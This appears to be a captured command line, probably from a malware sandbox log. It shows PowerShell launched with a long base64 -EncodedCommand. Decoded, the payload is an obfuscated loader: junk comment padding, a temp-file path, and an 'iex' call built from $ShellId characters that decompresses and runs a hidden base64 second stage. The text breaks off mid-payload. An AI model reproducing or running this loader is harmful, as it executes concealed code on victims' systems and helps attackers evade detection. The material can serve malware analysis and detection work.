c:\windows\system32\rpcrt4.dll
1208C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "IwAgAHwAUQA9AHIALgAoAFAASQAoAGQAfQAgADQAfQApAGkAQQBtAEIAdQBQAFgAeQBUAEMATABnACgAfQBBADEAfABRAG8ANwBOAEoAUwAxAE4ALQA4AEQAWQBHADMANgBnAC4AJQBOAFcAVwAmAFQAVQBYAEAAMQA6AFoASQBSAHgAdwBYACMARAA6AEsAaQBMAEIAXQBFACUAawA4ADUAXgB1ADEAfAByAEgAewAoAEYAbAAtAEgAXwAjACEARQBsAHwAdQBVACkAewBeAD4AIwB5AHAAfABsAGEATwAmADQAMABqAEgAPwBFAEgAagB6AEwAZAAmAHUAdABQAEAAOQA4ADMAXgB4AEoARQBaADkAfQBmAEAAIwBvAHsAeAB0AD4ASABUADsAJQB9AEQAcABRAFsAIQByAGkAYgBLADQAeQAzADYAVgBrAFQASQBTAHQANQBAAHQAKwAxAG4AJAA+AC4AdQBHACEAUwBMACMASQBeAE4AZABlADoAMQBUADUAUQBaAFAAdABEAFUASABxAHwAVQBJACYAUQBbADAAPAA0AEEAOQBeAGsAagAkAGIAMAB8AEEAWQAlAGIARwAwAFYAdAAzACMAQQAzAFcAZAB4AHwAVAA2ADgANABUAC0AdAA4AHsAeQBeAGgAUQAmAE0AMgBGAEIAXQAqAGcAVAA2ADEAIQBEAEoALQBGAHEASwAtAGkAMQAoAHYAaQAjAFcARQBOAD8AfQBUACgAaAAgACoAegBHAG4AdABkAGcAJgBAAEEAUAAxAEoAWQBvAGEAOAB1AGsAYwBEADwAMQBeAFMAaAAmAH0ASwB8AD0AVgBIAHoAcgBUAC4AIQAqAD8ASQBmADoAYQApAHMAZgBxAFgAQgA1AC0AUQBmADMAOQApAGYAUQA3AG4AIwBeAGMARwBTADQARgA7AGUAUgBGAGsATgA6AHsAMgAxACMARgA9ADoASwAhAFIARwA+ADQAJQA8AEcAIQBsAFQAawBPADkARAAgAEkAcQA0ADUAbgBLAHMAYgBiAD4AaAA/ACwAcgBfAE0AIwBsAE0AcABBAHgAegB7ACEAIQApAFQAVgA2ACoAVwA1AEwALgAgAEMAKwBYACkAOAB7AHUARgBvAEgATQB5AH0AJQBPAE4AcgArAHYAOgB8AFQAPQBiAD4AQgBLAEwANQBNAC0AUQAtAFcATgBSAEMALABxAEsANgBwAH0AVABKAFkAWQBhAG4ANgBRAGkAbwBwADIAVAB9AEYAWwAwAHEAYgA6AGsAdgBWAF0AJgBrAD8AeQBYAF4ANwBUAFQASAAsAEgAPwAzAF4AXwAmAE4ASgApAEYASABJACgAbQBOACwALgBrAGEAZQAwAHAALQB9AF8AQABMAHIAeQByADIANgB0AD8ASQBeAFoAOAByAF4APQBvAEgALgBTAH0ASQBsAHwAcQBGAEgAUQBOAGUALAB6AEsAegApACUAcwA3ACMAVAB7ADQANwAoAFIAZABfAEAAPQAwAFUAfQAyADsAPAB7ACAARQAtAD0AKQBIAEAAWQBXAFYALgB2AGMAWQBhAEsAKgApAGgAUgBtACAAdAAoAFMASwBQAA0ACgAgACAAIAAgACAAIAAjACAAawAzAD0AfQBOAGYAOQBnADIAPQBzADkAdwBBAFoARgBxAHEAVQBkAEEARwB5ACMAVwAjAC0ATwAyAFQAXQB3AEcAMgB4AG0AWQBxAFYAMwAhAHgAfQA6AG0AfQBmAC0AMwBXAHIALgBKADIARgBLAFgALQA0AEMAYgAoAHsAKQAxAFkAeAAxADcANgA8AD8AdgB2AHoALgBOAHsAcABNADsANgBLAHgAIAA1ADYAIwByADkAMQBCADwAZAAsADcAOwB5AEYAMwBAACEAJgAzADwATwB6AFMAPAB2AFAASgA6AC0AMwAjACwAMwA/AG0AaAB1AFAAPwAtADoAdgBRAGcAOgB0ACQASgBIAFYAXQApADsAPgArAF8AbwBiAH0AaQBQAFQALAA6ADAATgB0AEYAJQA+AFYAPABmAFQAdwBAAFsAMQBTAHgAKAB2AFYAQgBXAHcAagA7AGQASQAtAGYAUAAmAHsAcgA8AEoAJgBVAGkASABjAG0ANwB2ACgAXgAhAHsAPgBbAEAAPAAmAD8AVgB9AEsAYwBpAFQAJABLAE8AeQB9AEUAdQA/AFsARwBSAHUAfQA6ACYASQBnAF8AWwBqAHoAagA0AFEAQgA6ACsAUwBaAHAAKQBCADsAJQAgAHcAZgBAAEsAJgBMAEkANgB8AEMAagBuAG8APABJAGEAIAApAFgAcwBqACsAPwAqAEgAbwBxAHoAVgB6AHIAcABfADYARwBMAG4AWwBnAGQAVwBBAGUAagBoAGQATgBRAHsAXwBfACYATwBGAHUAVQBhAGMASQB2ADMALAB6ADMAdQBAADcAawA+AEUATgBUAEcAOAAzAHYAPQAjAFYAQgBlACYAQQBzAD4AYwBRAFgALgArAFsAVgBWAGcAIQB7AFoAaAB1AHgASwB3AGoALgBEADAANAAgADYAcwBIAEMAKABRACYAawBFAGQALgBVAEgARAAjAG0AfAA+AGYAKgAmAG4AXQA6AHMATgA+AEMASwBMADcAXwBZAHsAOgBOAEoAaQA7AFkAMwB4AEgAUwB1AEsAOgA/ACkAQAA4AEEAWQAzAD0AWQBrAG0ANgBJAE0AMQBfAD0ASQBNAD8AVQByAEkAUQAwAHcAfABQAEcAcgBrAFUAOgBRAGIATAArAFUAZAA7AGkAcgBIAGQANABdAGwAaAA7ACgARQB6AHgAdgAtAHwAOwBvACwAPQBwAEIAcwBRAFgAeAAmADAANQAxADYAMABHADAAZwBpADsAcwA7ACEAUwBdACUAPAB8AG0AbwA5AGEAWQBoAD8AUgA0AD0ATgBuAFkAPAB8AHwAQgB1AHYATQB4AHoAawBzAGgAXgAuAFoATQB3AFoAYQBBACgASwArAGoAbABIAGoASQBuAG4AVwBzAGoASQBuADQARwAxAEMAZQA+AGQANgB5ACoAQQBuADYAaQBaADwAMwA8AC4AYwBbAHkAKwB9AEYAOwA8AFAAfQBrAA0ACgAgACMAIAAgAEgAZwBAAFQAJABFAHwAUwBmAFgASABAAEAANgBoAG4AWQAkAHcAWQB5AH0AIABaAFcALQBaACoAKQBmACQANgBCAFUAKQBnAFUASgBHAEIAOABvAHcAPwA+AF4ARwB6ADkAXQBYACMAIABaADUAXgA2AGQAXgBSAG8AUwBBADIAOQB0AEwASwBtADcAQwBVADEANwAjADgAOAB0AE0AdABfACYARgB8AG8AZQBSADcAJgAzAHgAUwBJAHIANgBQAGoANwB3AF0AUAArAHgAeAA8AEYAVQBuAG8AdQB2AHMAJQBDACgARABfAHYAaAAyAFUAawA5ADMAMgByAGUARgBeAE0AQgBZAH0AWABiADcAbABxADwARABnAEIAXQBZAGUAXgA5ACYAeABdAFEARgAjAFcAOgBAADkAXQBZAFkAZwBGAD0AVABAAGkAcABuAHEAXgA2AGgAbgBSAC0AawBpADAAKABvAHgATQAwAGIANABhAHUAOABWAEwASgBDAHcAcwBTAGYAMABwAHMAWAB3AEUAaQBoAGgAQwBOAHgAfABIAFkAcwAwAFoAfQA5AGgAIwB6ACsASQBKAHgAMQA9AEAAWABwAHsAUQAlAHQAZgBEAEkANQA5ADkAIwB6AC0AOgBkAH0AZgB2AGkAPQBtAFsARgBfAGMARgBIAG8ATwB4AG8AVwAyAHgALQBRADAAcwAgADIAdwBtAGwAbQBAAHAANQAsAFMAegBPAHYAIwBlAEIAOQBwAEcAfQBWADwAPQAzAHIAVgBjAGwAZgA4ADEAeAB7AEwAWQBKAHkASABsAFcAZABnAGEAVABHACAASABKAGsAVwBSAEwAWgBOAFgAPgBBAGEASQBaAHQAXQAzADEAJgBzAH0AbQAmAHwAdQBoAHEARgA+AHYAOgBRAEkAbgA6ADwAeABbACQARABDADAAbQA5AGcAPQA0AFsAbgBmAEcAIwB9AG8AZgB9AHMARwBZAEAAQgBIACsAOwA0AGsAPABmAE8AewANAAoAIwAgADQANABAAEgATgBLAF4AZQArAEIATABtAEwAZQAhADkAOABqADEAWQBaAFcATQBpADAAIwBpAFIAPQBRADAAXwAxADUAfAByAFAARwA0ACkANwBmACAAPgBzAFQAKQA+AF8AfAAxAHwAIABFADUAUwAmAHIAfQAuADYAJQBnACoALgAwAG8AUwBdACwANgBBAFoAewBFACMAMwBbAEkAXgBTAE4AZgA0ADIAYQBhAHUAYQBvAHUAeAAgACoAfAA9AD4AQQA7ADoAQgBbAD0AXgBNAGwAagAjAFYAMwBWAE4AUgBVAEAAOgAoADsAMwBiAD8AIQAhAEEANQB9AFQASQA9AEEALQApAEwAYQBTAE4AcQAwACQAUwAqAGIAcwBhAFYALABsAG8APwBpACsAbQBQACAAdgAtAGsAKQBCAGkAQQA7AEsAbgBjAE8AegA1AGQAKQBrAFMAZAAhADsARQBaAGEAcAA6AFoALgBZAFAARwAsAHIAbQBXAEYATgBqAGwARwBHAHIATwBIAGMAVQA7AGcAUgBCAHQALAAkAEUAeQBMACQANwA0AC0AZwBqAHkAVwBPAFQAUAAyAHYARAB7ADUAUwB3AH0ARgB8ADwAMwA6AHIASwA5AEMAOAB1ADgAVQBBADkARAB1AHwAPgB7AHcAbwA7AG0AeAB2ADEAVwBzAG4AOgBEAFIAVABOAHsAeABlAHcASwBkAFkASQBeAFIAUgA+AGMAWABjACgASwB9AHoAewA6AGYAcABAAGIAcAA6AFIAQgB8AD4APwAtAC0AbwBVAEAAdAAqAGcAZgBlAHgAKABdAHAAUwB6AGcAdABaAFEATQBuAHgAMABUAEQAKABXAEwAWQBPADkAeQBbAEsAYQB4AG4AcgBeAE4AXQBuAE0AWQBoAFQAPwAmAEoAKwAwAEgAKQBNAEIAOAAmAHIATQBfAE0AZABtAEUAdABpAEIAMAB1AHYAUQAkAHYAQgB6ACUAQQBLACkAUgA9AEcAMgBmAEsAMgA1ADYANwAgADQAcQBBAGQARQBWAC4AewB4AHcAeQAhADYAVQA3AGUAcAA3AEcAVgBvAHYASQAuADAALABWADwAMwAtAEoAZwBFAHsAMgB2AG4AXgAmAEIAaAB4ADAAbwA9ACEAWgBZAC4AQwBEAEIATwB8ADsAXgBRAD4AdABXAD8AMwApAFYAdwBPAE8ATwB6AE4AZgBWADAAOgBYAFcAKAAoAEUAdwB9AGUAbABBAFcAQAAsAFcAPQA4ACAAcQAgACgAYgAmAHgAdQByAEkASQBTAE8AIABMAC0ASwBGAG8AOwBrADIAIwA8AEAARgBTAFcAcABqAD0ARgBCAD8ANAArAEYANQBJADYAWQAoADkAbgBMAE8AVwBhAHkAOAA6AG0AVwBWAFQAagBUAEsATwBvAFsAWQBFADcALgBfACsAVAB7AHMAUwAjAD4ATQAxAGUAdQBIACoAdQB9AHAAOQBeAG0ASwB9AHoAZABPAEIAegBJAFUAfQAwAHoAYwBPAGYARwBIAFYANABSAFMAWQBqACQALQAsAFQAOgBzAHgARwBdAC4AZgBkAHcAXgBZAEEATQBBAHYAewBXAEoAPQBuAGMANQA/AF0AOwB6AFgAUABFACEAawBaAFcAVABIAGUAMQBxAFgAWgBUAGUAUAB1AGIARQAmAGEAWgBCADAANwBvAHsAZAByAC4APwA2AGEAUQB5AE8ATwB1AFIAXQAjAGQAdABNAGQAVwA5ADAAPABpAFgAdQA4AG8AOgBKAD4APgAlAFoAVQB5AE8AbABUADoAWQBNAHUANABsAD8AXwBvAEcAUABOAEUAUgBYAFQASAA+AHsAUgA3AFoAbwBqAEUALgAyAGQAdwBPAGIAdwBlADsAZwAjAGsAegAhAGUAUABpADMAJgB7ACoAPgAtAEsAKwBaAGoAUABLAFQAXwBbADQAKgAhAEwAVwB4ACAAeAAwAHIASgArADAAaQBLAFMAPAAsAEgAPgBAADYAKwBhAEsARABdAD4AdAA4AGoAWgANAAoAIAAgACAAJABhACAAIAAgACAAIAAgACAAIAA9ACAAIAAgACAAIAAgACAANwA1ADQAOAA7ACQAYgAgAD0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAGEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAdABtAHAARgAwAEMANAAuAHQAbQBwACcAOwANAAoAIAAgACAAIAAjACAARABhAFsAfQBQADEAagAkADUAXgBLAGgAKQBlAHQARQA+AFAASQA6AG0ALQBJACYAIwAtADYAWQBQACEANgBLAGQALgAkADwAWAAyAEEAQAAmACYAfQA6AF8AeQB5ACYAYgBqAHkAJABDAEkAeABFAFAAfAAjAEkAXQBQAGMAZQBnADcAeABhACgAfQBnAGUAXQA9AFcAVQBsAEMAUAA1AGMAOgAhAHcARQAxACYAKABaAG0ALQB9AEIAUAA/AFIAQABYAHcAIQAlAF4ARQBGAGoAZABMACkAJgBSAEwAQwB3AFsAPQB8AE8AWQBjADgAcAAtAFsAOABJAGwARAA9AHcAYwBUACoAPQBqAHcASQBGAGcAewBOADsANAA5AFEARAAwAG0AagBmADIARwBpACkADQAKACAAIAAgACMAIAAsAFgAIwBmADAAbAAjADcARAAlADgASwBrAGsAcgBSAD4AVQBoAFUAPwBBAHUAOwBSAFgATgB9AEgAaQAxAFMAKwBoAE0AZwBJAGgAQwAtAHgAMABvACYAJQB5ADUAYgAmAFEAVgArACQAVgBqAFsAKgB0AHgALgBFAGIALQB0AEEAJABfADEAdgAmAFIAXQA9ACAAOABzAGoAeQBYADcAVgBGAHwAcQApADoAdQA9ACAAMAA3AHwARAA8AF4AbQBKAE8ALAB0AH0ALgB4ADYAKgAtAG4AKQBeAHwARAAgAGkARQBhAFYARQBRAE8AQgBLADAAegB4AE8AUgAjADEAdABvAFsAQABnAHMAewBNACQATAB2AFQAYQA0AGoANABoAHIASABkAHUASwAyAFoAZgBlADMAegA/AC0AWQBDADMATQB3AHsAZgBWAF8AVgAoAF8AfAA1AGUAaQAoAFEAPgAoAEoANQBwADoAVgBtAE0AMwBoAHYAfABVADYALAB3AE8ATQBMAGoAKgBKAC4AMQA6AHQAVwBpAFIAIwBwAF8ASQB4AEYANgBEAHEAJQAwACYAIABAACYAZQBCAHkAWAAkAF8AewBMAHcAWwBfAF8AfABTAEYAMgB6AHkALgBjAG4AVgBVAFkAawBNAEEAbwBHAG8AfABpAGgAbQB6AFMANAByAHkANABOADIAXwBEAD8AegBFADIARABSAHUAdwA0AHUAQwB3AFoAPgA/AFsAKgAjAFQAMwBLAHEAXgA1ADgARgArAGkATQB0AGkASABUAE4AawBhAEsAUwBWAE0AagA4AEIAbQAtACsANgBtADcAJABRAHgAcgA3ACMAdwA+ACoAIQBpADQAfQA3AHwATgBvAG8AfQB0ADoAMgBPAGIARwBGACgAcwByAG0AfABrACAAcQB6AG8ARwAtAHkAOQBiAEgANQAwAE0AeQA6AEcAYgBwAEQAJgBiAEYAPwBTAEUAUwAsAHcAIABBACQAOQAyAEAAJQA8AFgAYgAxADUAMwBiAHMAaABRACMAdAAlADoAPgB6ACUAPQAqADoAWABYAC0ANQA8AFAAQABVAFoAdQBhAE0AWwBbAHwALgBhAD4AWgBNAFQAMgBdAG8AZQBxACUAawBiAEAAKAB3ADAAfQAkAHAANQA9AG8AbQByAEIAJgBlAE8AZQBiAF4AbgBPAEQAUQA2ACAAaABBAGIAIQAmAEQAYwANAAoAIAAgACAAIAAgACAAJgAoACQAcwBoAEUAbABsAGkAZABbADEAXQArACQAUwBIAEUATABsAEkARABbADEAMwBdACsAJwB4ACcAKQAoACAAIAAgACAAIAAgACAAbgBFAHcALQBvAEIAagBFAEMAVAAgACAAIAAgACAAIAAgACAAIABzAHkAcwB0AEUAbQAuAEkAbwAuAEMAbwBtAFAAUgBFAFMAcwBJAE8AbgAuAEQARQBmAGwAYQBUAGUAcwBUAFIARQBhAE0AKABbAGkATwAuAG0AZQBNAE8AUgB5AHMAdABSAEUAYQBNAF0AWwBjAE8AbgB2AEUAcgB0AF0AOgA6AGYAcgBvAE0AQgBBAFMARQA2ADQAcwB0AHIAaQBuAEcAKAAnAHAAVgBUAFIAYgB0AG8AdwBGAEgAMgB2AHgARAA5ADQAaQBJAGQARQBNAHMAaQBqAGEASgBxAEsASQBwAFcARwBkAHEAdgBVAGEAaABWADAAVwB6AFgARQBnADAAbAB1AFMAVABUAEgAagBoAHkAbgBEAFMAdgA3ADkAOQAwAGsAWgBvAFUAdQBHADAAVgA3AGkAZQArAE4ANwBYAFAAdQA5AFQAbgAyAEsAQQB5ADcAdAA2AHMAVQBTAFAAVQBkAHcAMwAwAHMAWQB4AE0AcgBTAFUANwBiAHIAYQBNADgAaQArAFcAUwBUAEYAZQBaAGcAVwBSAEkAdAByAFAAZQBKAEoAYwBtAFQAcQBCADMASwBRADEAbwBsAFUANQBCAFAAOABRAEIAWgBNAFAAVwBVAFoAbwB2AFIAQgB5AFEAUQBQAEEAcwBJADMAZABQAEoARgBBAHkATQB5AFMAUABwAFMARQBqAGoAeABXAE0AcwBUADQAOQBLADQATQBCAFkAOQBTAHYALwA3AHkAbgA0AHkAcgBvAE0AMwBwAGUAQgBXADgAWgBJAHMAMwBHAFEAbAB3AG0AcQBkAEwARwBhAFgAOABIAEwAVQBFAGMAOQA5AHYAdQBQAEQAUABjAEkAQQBFAFUAeQBDAHcASgBGAG4AQgBqAE4AUABtAFUAZwByAHoAUgBDAGsAdgBJAG4ASQBxAHIAbwBBAHUAbABCAEYAbgBSAEsAdgB2AGgAdgBoAGEAdgAyAHUAVQBMAGwAYwBGAEgATABrAE0AQgBqAGkAVQBvAFgAbwAxAGcATgAzAHkASgB0AGMAbQA1AEcAQQBtAGgAZwB2AFAAaQBOAHcAeQAxAHcAYQBhAHcAZQB1AEQAMQBzAEQAaQBzAHoASwA4ADYATgBtAEMANwB2AG8AWgBFADYAVgBVAEQAegBXAEoAbABZAEQAWgAvAEoAbABLADUAVgBlAE4AQQBNAHQAcwBQADAAaABrAEkAVABHAE4ASABuADIAMwAwADMAMQB3AFgASQBzACsAaQBTAC8AUwBOAHoAbwBQAFMAagBUADQAUABJAHYAZwBYADQAYQBIAGkAKwBCAHEANABnAFEAbQBlAG0AWQBIAGIAQwBKAFAAdwA3AHcATABaAG4ARwArAEMAUgBUADAAUgBiAFAATABRAGYAWABhADkASgBhAHUAYQBtAE4AUgBHAFQARABjAEsAaABPADYAVAAzAFIARgA1ADIAMwBZAGQAcgBjAC8AVwAvAG4AcQA4AFAAcQBmADMAWABHAFIAQQAwAHgASQB2AHYAbgBjAGkAegA2AHYAWAA5ADcANwBoAEYAWABNADEAbQBCAHcAYgBxAE4AWQBNAEwAVgBEAGkAdgBYAEIAWgBSAEwAZQAyADAASwBvAEEATgArAHgAZABnAFYAeQBhAGkATABMAGkARwBPAC8AYQBtAGgAVgA5AEgARABBAGIATQBNAHUAVQA3AEQASQA5AGIAZABzAC8AYwBvAGMANwB6AEQAKwByAHAAdABTAFEANABMADQAMwBmADMAZwBpAG8AZwBsADEAcgBDAHIAYgB4AEEATgBXAGUAVQBHADUAZQA4AEQAeAB6AFMAbgBoAEgANABjAGwAZQBvAE8AOQBTAC8AegB3AFoAVgA4AGwAOAB1AE4AKwA1AEIASwB5ADIAVgBpAE4AVgBlADgASAB0AEMASQBZAHIAOABGAE4AdQAwAEkAdwBKAE4AagBOAHQAOAArADcARgBzAEUAYwBJAGsATAB6AEoASABhAEYAYwAxAGgAWgArADUAUgAwAHIANwBoAGMANQBuAHcASgB4AEoAOQBHAFgASwBlAHQAbwAwADcAbwB6AFgAdwBsAEgAMABDAGIAKwBjAG4ASgBoAFYAYgBKAEcAYwAvAGcAMwBXAEIAcQBOAEQANwBzAGoAdgBNAEIAVABCAGYAbgBEAGEAQQBBADMAUQBsAC8ASgBKADIARgA2ACsASwAxAHUAcwBQAFYARQAyAGQAVwBuAHYAbAB4AGYAOQA3AGgAdABCAFAAaQA3ADEAOAA9ACcAIAAgACAAIAAgACAAIAApACwAIAAgACAAIAAgAFsAcwB5AFMAVABlAE0ALgBJAG8ALgBDAE8AbQBQAHIAZQBTAHMAaQBPAE4ALgBjAE8AbQBwAHIAZQBTAFMAaQBPAG4ATQBvAGQAZQBdADoAOgBkAEUAQwBvAG0AcAByAGUAUwBTACAAIAAgACAAIAAgACAAKQB8AA0ACgAgACMAIAB2AFUAMQAlAEoAbQA1AFUAdQBdADcAOABdAHMAdgBNAEUAagBwAF4AZwBwAEQALABVADcARwAtAEMANAAxADUAfABaACkARwBIADEAfABDAGMAPgB7AFUAPgBkAFoAOgBUAGUAWgBnAE8AdAB2ACEAZwBdACEAMABXAFIASAA6AHwASQAzAFkAXQA5AEQATwBPADcAXgBjAEgAeQBmADkAbgAsAEgASgBPAEAAegB9AFgAJQBrACMAPgBJAFIAcQArADsAbQBxACsAZABEAHQAQAA9ADkAbABjAGQATAAxAEUAfQBKAD4AZwBEAGkAZQA4AHQASQBYAC0AOgBdAEgAMQA8AFoAPgAsAEYAZgAyAFMAOABRAHYAfQA2AEYAVwA8AF8AIABAAF8ALgAsACQAcQAgAFkASQApAD4AKgBAADIAZAAxAFUANABTAFgAQABrAE4AdABPAG4AXgA5AHIAXgBBAGsARQBfADwAdgBUADwAeQBAACoAPAA9ADMAZABHAFoAUgBhACoAbgBJAHEAQwAoAEcAbAA/ADUAVgBIAC4AcQBXAFoAaABkAHkAYwAoAHsAaABaADwALABLAD0AagAkAG4AbgAtAEEAZwA1AEwAbgBOAGsAdABHAD0AJQBHAHoAMgBkAH0ATgBsADUATgB5AFcAaABrAHkAKAAtAFgAZgBdAGEAMQBhAF4AcgBWADkAOAB6AHUARQBPAFgAVABZAGYAbgB6AG4ASQB2ACEAOAAmAHYAKQBBAEwAaABCAEEAOwBNAH0ATwBZAD0AOgB3AHEAVQBnAHcAMgBZAHQAWwAoAE0ALQBuADkAeAAtAFIAWwBTAG4AZQBeAFMAVQBXAEAANwAhAGUASQBmAEcAZQA2ADMAKQBTAHIAPQB7ADMAJABIAE0AZwBaACQAbwAkAGIAZgA5AFkAQAAhAG8ANAA2ADQAZAB9AEoAWwB4AHIAUgA3AGIAcQBwADEAIQB9AHAANABDAHYAIQBbACsAMQAtAGEAVQBKACwAdgAsAG0AMAAyAHkASwBFACAANABxADQAJQA7AHUAWwBIAFkAawA9ADgANABuAFIAewAgAG4AZAA2AEEAJABaAHwAVABtAHAAOABDAGEAUwBrAFkAOwBqACEAYQAmAGgARQBmAD8AXQA/AFIAaAB9ACoATABXAE8ANABTAHcAZAAhADcAIAApAEEAJQBJAHkAcgAwADkAOABNADMARwAqAFAAWQBHAGgAQwAhAEcAawBVADoAKAAzAFMAUQAgAGcAQAB1ADYAIwBXAHgAKQBbAHwAYwB5AHkAdwAxADoASgBKACYAPgBuAGUAbgB9AG0AOwBXAGsAQAAyAGUAVwB9AGkALABlADcAIwBKACgAVAAhAHYAewBxAHYAIQBuADcAXwBOAGwAdwBAAFgATABiACwAOgBCACAAWgBhAD4AIABjAGEAKwBbAEUARwA3AHcAIAA7AHwAUAB5AEcANAAmAGwAdgBkAC4AZABaADoAKQApAHUAWgBoAD0AUgAzAFMAWgA3AC0ASABzAE8AdAB5AEcASwBVAGsAOQBiADgANQAxADUAUAA0AFkAUgBbAEEAYwAsAFsARwBmAHcAUABiADgAcgBNACEAJQAhAFIAeABjAHAAPQBPAGIAUQAtAGsAdwBAAFIAeQB0AHAATgB4ACEAYwB5ADcAXgBeACoAegBVAFkANwBbACgAOwBuAEwAagApAEQAWgBNACEAbgA+AG4ASQBsAFkAdAAoAF0APQBJACEAaAApADkAMgBBACkAcgBBAC4AXgBOAFgAKQAyAGcALABnAE4ANQBbAGQAawAzAH0AMABFAFYAXQAkADIAXQA7AFAAPgBGAEsAKwBnADAASABzAHsAKQB5ACMAbwBKAGsAVAAzAGEAdQAsADIAXQBtAFoAYgA1AHIATQBwADUATAAjAFQAIwBSAGEAUgBlADcAKAAkAEkAaABjAEQAaABRAHYAaAB9AGsAZwB3AHgAIQBqAFgAVwA0AHIAUwA6AD8ALQBnAE8ARgA2ACMANgBhAEEAMgBpAHIAKwA3ACQAYQBPAH0ANwArACUAawA4AEUATwAuAC4AQQBSAGMARABIACQAMgBpAFgAJQBLACkAQABuAGcAagBFAFEANQAmAEEAdQBaACEAMgBuAHUAXQBBADMAZwBwAFYAfQBpAHoAOgAhAFEAXQA6AGkAQgBEAHUAeAAkAEgAIQA3AEYAOABJADYAIQAxAC4AdQAwAHMAVgANAAoAIAAgACAAIAAgACMAIABvAFIAOABNAHUAWgBrAF8AaABRAF4AfAA4ADEAcABdAHYAOABfADUAaAA0AF4ATgBrAHgAYwBaADwAaABtADgAVgA7AGcAegBUADQALAB0AGYAOgBkAEgATwA2ADcAIwAgAE4AeABMAEAAOQBqAGEAOgAgADoAfQBoAGQAUgBdADMAbwA3ADsAUABZADAAdABNAFcAYwBMAG4AWgBvAHwAZgApAEoAOwBQACYAPAA7AEoAIAA9AHQAIQBWAGsAWwBLADwAUQAyAF4AfQBGAHEAUABqAGYAWwArACsAfAAoAE8AXQA2AHcAWgBhAD8AfABIAEUAVQBmAGsAWABnAE0AWQBkAEUAdwB1ACUAcQA3AEsATwAjAGcALgBfAFsARABDAFQAYQBoAG8AaQBpAF8ASQAoAC0AaAA0ADsARgA0AGUAIAAxAGkAKQB7ADIANQAsAEIAawBxAEYAZgBfAFQAegBjAFoASwA2AFYAUwBaAFgANgBiAGUAPABTADIAZQAlAFkANgA/AF8AewBaAE0APQBCAD0AIABYAGcAWQB2AHgAPQBNAFsASQB3AHgAPgB6AFsAWgA/AHoALQBVAGIAWgAzAHEALABZAFkAWABlAFgAMgB2AGwAKgA5ADsAXwBpADAALAAqAHwAdwB5ADMATwBaAH0AYgBWACwAYwBGAD8AKgApADMAdABmAF4AbQAzACsAZQApAF8AUgA2AFsAZgA0AHoARwB7AGEANABZAE0ATgBXAD0ASABLACEAJQA3AHgAdABwAGYAUgAgADQAfABQAFEAdgB8AF0AVQBsAE4APQBEACoAOgB9AGcAVQA4ADAAJgBpADwAOwBWAFcAQwB0AHoAJABmAGMAfQB3AHAAcgBxAC4AbABMAH0ALAA5AF8ALAA4AGQANgBIAEwALgAwAF0ALgBQAHAAdQBvAGQAfQBwACUAawAxAGwAPQBeAF4ATgBeAEYATwBoAEUATgBFAF0AcwAoACQAUgBYACkAewAxACgAewBKAFQAYwBPAH0ASwBHAHIAZgA7AHUAWwBEADkAbQBxACoAPwA5AGMAZQAtAE0ALgBWAFcAVgBAACoAQwBvAC4ARQBWACgAawBpAEcAdgB3AHMAIQBaAGMAVgBRAFUAcgAtAE8AUAAsAGoAawAtAE0AMwBCAG4AIQB3AHYATQBQAGYAKgApAEcAVgBOAEEAUwAjACQAaAA8AFkAQQB6AE4AIABGAHMAJgA6AFUAQwA2AGkAKgBMAHQAbgAmADsAMQB8AEsAPwBqADcAKwBLAFUAUQBMACgANgBoAEwAPgB7ACEAcQA1AFMAZwBPAEsAbAA4ACgAKQAzAGEANQBxAG4AQwBuAF0ATAAyAGwAVQApAEkAaQBVAEQAVgB4AEIAQQBIAGMAOgBOAFQAPwAyAEoAMAA+ACUAegAxADwAbgBCACsAVgB8ACYAeAA6AGUAUQBpAEQALgBTADwAdgBDACQAUQAsAGoAKQBPACYAPABYACQAXgBIAGEAJgA8AEUAQwAwAGgALABUACwASQAlACEAJgBNAGIATwA6ADkALABOAG4AKABDACwAWQBpAFEAYgA9AEcAQgBHAD0ASwA4AEgAQwAmAFQASwBUAF0AJABlAG8APgB7ACoALgA8AEwAWABRACAAcwAzADUAaABuAFAAMgAsAHwAbAB9ADgAOwBFAEYAMQAoAEEARQBJAGYAbwBUAGkASgB5AHcAbwBMAA0ACgAgACAAIAAgACAAIwAgAF8ATgA+AFEAJAB0AGgANgA2AFAAbQBVACUAewAxAHcAeQBRAE4AdAAlAGkANgAmACEAbQBxADYAPgAlACMAZQBAAHAAegAhADgAJQBOAEQAIwApAF4AMAA/AD8ANwApADAAdwBSACQAbAB6AFMAKwAsAFIAUAB2AGsAPwB0ADsAOABdAFsAVgB0AGEAeQByAHAAUwBVAFoAbAB7AFcAMQBNAGoAWABbAFQAMABNACMAQQBhAEIAIQA8ADsAcQBiACgARwBsAFYAQAAmAEsAbgAmAHUAbgBRAE8AeABAACEANgArAE8AMQA8AC4AeAAkAGQAIwB0AGcAJABhAG8AbQB2AHQAMQBSAD8AJABoAGkAcwAjAFAAagBHAF8AdQBxAFgAVQAyAGYAewB8AF0AVABBACMAXgB5AEwAIQBBADwAMgBoAEEAbABvADoAfQBRADwAYwA4AHcAIABjAFIAXQBtADwAPwA9AF4ASQA2AE8ARABBAEQAZwA5ADMAewBdAG4AeABbAGgATAAyAFYAcwA0AC0AIwBfAFcAYQAwADgASgBRAFcAWABXACEAVAAwAHkAbwBXAD8AawBFAEUAbwAsAHMATAB0AHYAbQBvAHgAPABmAEwAOQAzAHEAUwAjAD4AbAA3AD4AVgA8ADIAWwBdADcAZgBoACkAOAA4ADEANgBHAEIAKgBZADwAfQB6AEUAaQBKAHgAUgA3AE0AegB3AD4AZQBLAF0AWQA8AEgAMAB0AF4AXQBwADEAcABmAEgADQAKACAAIAAgACAAIAAgACAAIAAgACUAIAB7AA0ACgAgACAAIAAgACAAIAAgAG4ARQB3AC0AbwBCAGoARQBDAFQAIAAgAEkATwAuAHMAdABSAGUAYQBtAHIAZQBhAGQARQBSACgAJABfACwAWwBTAFkAUwBUAGUAbQAuAFQAZQB4AHQALgBlAG4AYwBvAEQAaQBOAEcAXQA6ADoAQQBzAGMAaQBJACAAIAAgACAAIAApAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAfAANAAoAIAAgACAAIAAgACAAIwAgAE4ANABEACAAQAArAF4AMwBmAGkAKQBwACoAbwBTAGIAKAAhAEgAOAA4AE0AaAAmAE8ANAAuAG8AOAA8AHUATwAxAGUAawBkADAATgBUADkAdgAzAFAAeQB5AEIALABjAFcAcAB6AC0AWgBDAFsAJQBwAEIAMAAlAFQAdw